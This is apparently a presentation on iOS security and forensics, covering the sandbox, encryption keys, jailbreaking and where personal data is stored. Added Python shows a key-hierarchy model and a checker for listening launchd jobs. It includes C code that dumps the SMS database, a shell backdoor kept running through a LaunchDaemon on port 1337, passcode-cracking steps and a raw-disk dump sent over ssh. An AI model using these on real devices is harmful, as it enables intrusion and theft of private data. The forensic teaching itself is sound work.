iOS Security and Forensics

Page 2: Apple's Security Model

- iDevice applications are available on the Apple Store
- Tested, analyzed, approved, signed, then distributed by Apple services
- Installed in /private/var/mobile/Applications/{Unique_App_ID}
- Full list of installed applications: /private/var/mobile/Library/Caches/com.apple.mobile.installation.plist
- Executed under the "mobile" user in the TrustedBSD sandbox
- ASLR and DEP activated
- All that, on a fully encrypted filesystem.

Page 3: Apple's Directories Sandboxing

Page 4: TrustedBSD Sandbox

- Open source project for FreeBSD systems
- Sponsored by Apple, Google, Yahoo!, NSA...
- Modified and used by Apple for OS X and iOS
- Installs a series of hooks in order to intercept and filter syscalls
- Policy retrieved from a human readable file, then passed to the kernel in a binary format
- Finally the kernel installs the sandbox rules for the process

Page 5: Policy rules

- Stored in /usr/share/sandbox and hardcoded in the kernel
- Some policy configuration is done by the user through popups
- Written in ESDL schema, human readable:

    (version 1)
    (allow default)
    (deny file-read-data (regex #"^/private/tmp/test\.c$"))

- Running a shell under that policy, then reading the denied file:

    $ sandbox-exec -p "${POLICY}" /bin/sh
    $ file /private/tmp/test.c
    test.c: cannot open: Operation not permitted

- Running a shell under a named built-in profile:

    $ sandbox-exec -n no-internet /bin/sh
    $ ping 4.2.2.2
    ping: sendto: Operation not permitted

- The sandbox_init() syscall uses libsandbox.dylib to convert the policy into binary format.

Page 6: iDevice Storage Device

The NAND storage device is laid out as follows:
- BOOT (block 0): contains the bootloader
- PLOG (block 1): contains the EMF, BAG1 and Dkey
  - EMF: used to encrypt the entire filesystem and the HFS journal
  - BAG1: used to encrypt the keybag
  - Dkey: used to encrypt files without an encryption policy class
- NVM (blocks 2-7): stores the NVRAM parameters
- FIRM (blocks 8-15): stores the firmware, iBoot, device tree and logos
- FSYS (blocks 16-4084): stores the encrypted filesystem
- RSRV (last 15 blocks): reserved

Page 7: Encryption mechanism

Starting from the iPhone 3GS, Apple devices contain a hardware encryption processor. It provides the following:
- UID keys stored in the processor
- 0x835 and 0x89B keys derived from the UID key
- Filesystem:
  - Data partition encrypted with the EMF (AES-128)
  - System partition encrypted with a hardcoded AES-256 key (in kernel and bootloaders)
- Keychain encryption with the Dkey
- The Keybag contains the Master Keys for the Protection Classes
  - Some Master Keys are encrypted with the passcode
- Each file on the filesystem is encrypted with a "cprotect" key
  - Each "cprotect" key is encrypted with the file's associated Protection Class Master Key

At boot, the EMF and Dkey are extracted automatically.

Page 8: Protection Classes

Whether a file can be decrypted is governed by its associated "Protection Class".

Protection Classes used for files:
- NSFileProtectionComplete: file only decrypted when the iDevice is unlocked.
- NSFileProtectionCompleteUnlessOpen: file only decrypted when the iDevice is unlocked. It stays decrypted even after lock if the application keeps it open.
- NSFileProtectionCompleteUntilUserAuthentication: file decrypted after a successful unlock. It remains decrypted until the next reboot.
- NSFileProtectionNone: file decrypted using the Dkey.
- NSFileProtectionRecovery: undocumented.

Protection Classes used for keychains:
- kSecAttrAccessibleWhenUnlocked[ThisDeviceOnly]
- kSecAttrAccessibleAfterFirstUnlock[ThisDeviceOnly]
- kSecAttrAccessibleAlways[ThisDeviceOnly]

Page 9: Data wiping and recovery

- Filesystem wiping consists of rewriting the EMF and Dkey
- File deletion consists of rewriting the associated cprotect key
- The filesystem's journal:
  - is encrypted with the Dkey
  - contains cprotect keys in cleartext
  - rotates depending on filesystem activity
  - could be retrieved and used to recover deleted files
- /dev/disk0s1s2 raw data backup:
  - Connect the iDevice to a power supply
  - Disable the autolock
  - Run:

    $ dd if=/dev/rdisk0 bs=4k | ssh -C username@computer_ip 'dd of=/home/${USER}/dump.dmg'

  - Wait... for... a... while....
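To make the key hierarchy of pages 7 to 9 concrete, here is an added Python model; it is not code from the slides and not iOS code. It keeps a per-file cprotect key wrapped under a class master key, the Complete-class master key in a keybag under a passcode-derived key, the Dkey protecting class-None files and the journal, and an EMF layer over the whole partition, so that "delete = rewrite the cprotect", "journal still holds the key" and "wipe = rewrite EMF and Dkey" can be exercised. The cipher is an HMAC-SHA256 counter-mode keystream standing in for AES, and the salts, nonces and class set are the example's own choices.

```python
import hashlib, hmac, os

def keystream(key, nonce, n):  # HMAC-SHA256 in counter mode as a PRF keystream: stdlib stand-in for AES
    return b"".join(hmac.new(key, nonce + i.to_bytes(4, "big"), hashlib.sha256).digest()
                    for i in range(n // 32 + 1))[:n]

def xor(key, nonce, data):  # stream-cipher XOR: encryption and decryption are the same operation
    return bytes(a ^ b for a, b in zip(data, keystream(key, nonce, len(data))))
def wrap(kek, key):  # encrypted key plus a tag, so unwrapping under a wrong KEK fails cleanly
    return xor(kek, b"wrap", key) + hmac.new(kek, key, hashlib.sha256).digest()
def unwrap(kek, blob):
    key = xor(kek, b"wrap", blob[:32])
    tag_ok = hmac.compare_digest(blob[32:], hmac.new(kek, key, hashlib.sha256).digest())
    return key if tag_ok else None
def passcode_key(passcode):  # keybag KEK derived from the passcode (salt and count are example choices)
    return hashlib.pbkdf2_hmac("sha256", passcode.encode(), b"keybag-salt", 1000)

class ToyDataPartition:
    COMPLETE, NONE = "NSFileProtectionComplete", "NSFileProtectionNone"
    def __init__(self, passcode):
        self.emf = os.urandom(32)   # EMF: partition-wide layer, extracted automatically at boot
        self.dkey = os.urandom(32)  # Dkey: master key for class-None files and for the journal
        # keybag: the Complete-class master key is stored wrapped under the passcode-derived key
        self.keybag = {self.COMPLETE: wrap(passcode_key(passcode), os.urandom(32))}
        self.files, self.journal = {}, []  # journal: cprotect keys protected only by the Dkey
    def _master(self, pclass, passcode):
        return self.dkey if pclass == self.NONE else unwrap(passcode_key(passcode), self.keybag[pclass])
    def _layers(self, path, cprotect, data):  # per-file cprotect layer on top of the EMF layer
        return xor(cprotect, b"file", xor(self.emf, path.encode(), data))
    def write(self, path, data, pclass, passcode=""):
        cprotect = os.urandom(32)
        wrapped = wrap(self._master(pclass, passcode), cprotect)
        self.files[path] = (pclass, wrapped, self._layers(path, cprotect, data))
        self.journal.append((path, wrap(self.dkey, cprotect)))
    def read(self, path, passcode=""):
        pclass, wrapped, ct = self.files[path]
        master = self._master(pclass, passcode)
        cprotect = unwrap(master, wrapped) if master else None
        return self._layers(path, cprotect, ct) if cprotect else None
    def delete(self, path):  # "file deletion" only overwrites the wrapped cprotect key
        pclass, _, ct = self.files[path]
        self.files[path] = (pclass, os.urandom(64), ct)
    def recover_from_journal(self, path):  # the journal still holds a copy of the cprotect key
        for p, blob in reversed(self.journal):
            cprotect = unwrap(self.dkey, blob) if p == path else None
            if cprotect:
                return self._layers(path, cprotect, self.files[path][2])
        return None
    def wipe(self):  # filesystem wipe = rewrite the EMF and the Dkey; ciphertext stays in place
        self.emf, self.dkey = os.urandom(32), os.urandom(32)
```

A deleted class-None file is unreadable through the normal path but comes back from the journal, while after a wipe neither the journal nor a correct passcode yields plaintext, since the EMF layer is gone.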

Page 10: Security chain

Page 11: Jailbreak

- Execution of third party applications/code allowed
- Unsigned code execution granted (depending on the jailbreak)
- Complete bypass of the sandbox
- Root (/) partition mounted read/write

Before jailbreak:

    $ cat /etc/fstab
    /dev/disk0s1 / hfs r 0 1
    /dev/disk2s1 /private/var hfs rw 0 2

After jailbreak:

    $ cat /etc/fstab
    /dev/disk0s1 / hfs rw 0 1
    /dev/disk2s1 /private/var hfs rw 0 2

Note: on iOS >= 5, /dev/disk2s1 became /dev/disk1s2

Page 12: Useful information

- launchd: first binary executed while booting (init-like)
- watchdog: checks whether a process has been running in memory for more than 5 minutes; if so, it reboots the iDevice
- launchctl: used to control daemons

    $ launchctl load com.adel.reverse_shell.plist

- ldid: Link Identity Editor, used to sign a binary

    $ ldid -S my_binary

- usbmux: protocol created to encapsulate TCP over USB connections. Optimized for and used by iTunes.
- XCode: development platform on Mac OS X, freely downloadable from the Apple Store
- Cydia Store: unofficial online application store for jailbroken devices
- SSH binaries: freely available as a package on the Cydia store.

Page 13: HelloWorld for iDevice

- Simple HelloWorld program:

    $ cat helloworld.c
    #include <stdio.h>

    int main(int argc, char *argv[])
    {
        printf("HelloWorld\n");
        return 0;
    }

- Cross-compiling with the iPhoneOS SDK:

    $ export PF=/Developer/Platforms/iPhoneOS.platform
    $ $PF/Developer/usr/bin/arm-apple-darwin10-llvm-gcc-4.2 -o hello helloworld.c -isysroot $PF/Developer/SDKs/iPhoneOS5.0.sdk/

- Binary self-signing:

    $ ldid -S hello

- Simple binary file transfer over SSH:

    $ scp hello root@<iDevice_IP_Addr>:/usr/bin/my_binary

Page 14: Local File Disclosure

    $ cat lfi_smsdb.c
    #include <stdio.h>

    int main(void)
    {
        /* a binary running outside the sandbox can open the SMS database directly */
        FILE *fp = fopen("/var/mobile/Library/SMS/sms.db", "r");
        int c;
        if (fp == NULL) {
            perror("fopen");
            return 1;
        }
        /* checking fgetc's result avoids printing a bogus byte at EOF, unlike a feof() loop */
        while ((c = fgetc(fp)) != EOF)
            putchar(c);
        fclose(fp);
        return 0;
    }

Page 15: Reverse Shell

    $ cat reverse_shell.c
    #include <stdio.h>
    #include <unistd.h>

    int main(void)
    {
        /* replace this process with a shell; argv[0] must be set for the shell to start cleanly */
        char *argv[] = { "/bin/sh", NULL };
        execve("/bin/sh", argv, NULL);
        perror("execve"); /* only reached if execve fails */
        return 1;
    }

Page 16: Process Daemonizing

- Copy reverse_shell to the iDevice's /usr/bin
- Copy com.adel.reverse_shell.plist to the iDevice's /System/Library/LaunchDaemons/
- Reboot the iDevice, or:

    $ cd /System/Library/LaunchDaemons
    $ launchctl load ./com.adel.reverse_shell.plist

Page 17: plist Manifest Format

- XML file format, used for configuration purposes

    $ cd /System/Library/LaunchDaemons
    $ cat com.adel.reverse_shell.plist
    <?xml version="1.0" encoding="UTF-8"?>
    <plist version="1.0">
    ...
      <key>Label</key>
      <string>com.adel.reverse_shell</string>
      <key>Program</key>
      <string>/usr/bin/reverse_shell</string>
      <key>Sockets</key>
      <dict>
        <key>Listeners</key>
        <dict>
          <key>SockServiceName</key>
          <string>1337</string>
        </dict>
      </dict>
    ...
    </plist>
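As an added defensive check that is not part of the slides, the Python below parses launchd manifests and reports every job that declares a Sockets listener, with its program and service name, which is how a daemon like the one above stands out when the LaunchDaemons directory is triaged. The two manifests are constructed for the example: the first mirrors the fields shown on this page, the com.example.logger job and both file paths are made up.

```python
import plistlib

# Constructed sample manifests for the example (not taken from a real device)
SAMPLE_MANIFESTS = {
    "/System/Library/LaunchDaemons/com.adel.reverse_shell.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.adel.reverse_shell</string>
  <key>Program</key><string>/usr/bin/reverse_shell</string>
  <key>Sockets</key><dict><key>Listeners</key><dict>
    <key>SockServiceName</key><string>1337</string></dict></dict>
</dict></plist>""",
    "/System/Library/LaunchDaemons/com.example.logger.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.logger</string>
  <key>ProgramArguments</key><array><string>/usr/libexec/logger</string></array>
</dict></plist>""",
}

def socket_entries(sockets):
    # launchd.plist(5): Sockets maps a name to one dictionary or to an array of dictionaries
    for value in sockets.values():
        for entry in (value if isinstance(value, list) else [value]):
            if isinstance(entry, dict):
                yield entry

def listening_daemons(manifests):
    """Return (label, program, service names, manifest path) for each job that opens a listener."""
    findings = []
    for path, blob in manifests.items():
        try:
            job = plistlib.loads(blob)
        except Exception:
            continue  # unparseable manifest: outside this check, but worth a manual look
        sockets = job.get("Sockets")
        if not isinstance(sockets, dict):
            continue
        services = [str(e["SockServiceName"]) for e in socket_entries(sockets) if "SockServiceName" in e]
        # Program takes precedence; otherwise the first ProgramArguments element is the executable
        program = job.get("Program") or (job.get("ProgramArguments") or [None])[0]
        findings.append((job.get("Label", "<no label>"), program, services, path))
    return findings

if __name__ == "__main__":
    for label, program, services, path in listening_daemons(SAMPLE_MANIFESTS):
        print(f"{label}: {program} listens on {', '.join(services) or '?'} ({path})")
```

On a real device the manifests would be read from /System/Library/LaunchDaemons and compared against a known-good baseline of Apple's own jobs.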

Page 18: Physical Access Pwnage

Many possibilities:
- Easy: the iDevice has no passcode
  - Full access to data over SpringBoard, SSH or after booting on a ramdisk
- Medium: the iDevice has a passcode < 4 digits
  - Booting on a ramdisk, patching the kernel and cracking the passcode
  - Needs at most 30 minutes of passcode cracking (10^4 possibilities)
- Medium++: the iDevice has a passcode > 5 digits
  - Could take time to crack
  - The xkcd $5 wrench shall be used!
- Hard: the iDevice has a boot passcode (EMF + Dkey encrypted with it)
  - Does it exist?

Page 19: LiveCD vs RAMDISK

- A 2 MB HFS+ container with:
  - a customized launchd
  - binaries to copy/execute
  - plist files
- Loaded into the iDevice over USB after rebooting into DFU mode:
  - exploit the iDevice vulnerability
  - load the ramdisk into RAM
  - execute launchd
  - disable the watchdog
  - option 1:
    - scan and mount the filesystem (EMF + Dkey auto-extracted)
    - copy files on the filesystem
    - chroot into the mounted filesystem
  - option 2:
    - initialize the usbmux protocol
    - read and send raw NAND data over USB (EMF + Dkey must be extracted manually)

Page 20: Sensitive Data

- Keyboard cache
- Clipboard buffer
- Consolidated GPS positions database and latest GPS position
- Applications and Safari snapshot cache
- Google Maps cache and history
- Address book, photos, songs, voice records, notes, calendar, call history
- SMS, MMS, drafts and Spotlight SMS cache
- Geolocation tags on photos
- Safari cache, search list, bookmarks, cookies, history and WebKit cache
- Installed applications list
- Emails, applications, their data and cache
- Latest dialed number, bookmarked contact list, IMSI, ICCID
- Configured access point list...

Page 21: Keyboard Cache

Contains the keyboard cache:
- Written known and unknown words
- One cache per language
- Available in /private/var/mobile/Library/Keyboard/


Page 23: Applications snapshot

Available in: /private/var/mobile/Library/Caches/Snapshots/{APP_NAME}/{NAME}.jpg

Page 24: Consolidated GPS Positions Database

Available in: /private/var/root/Library/Caches/locationd/consolidated.db


Page 27: End.

Questions?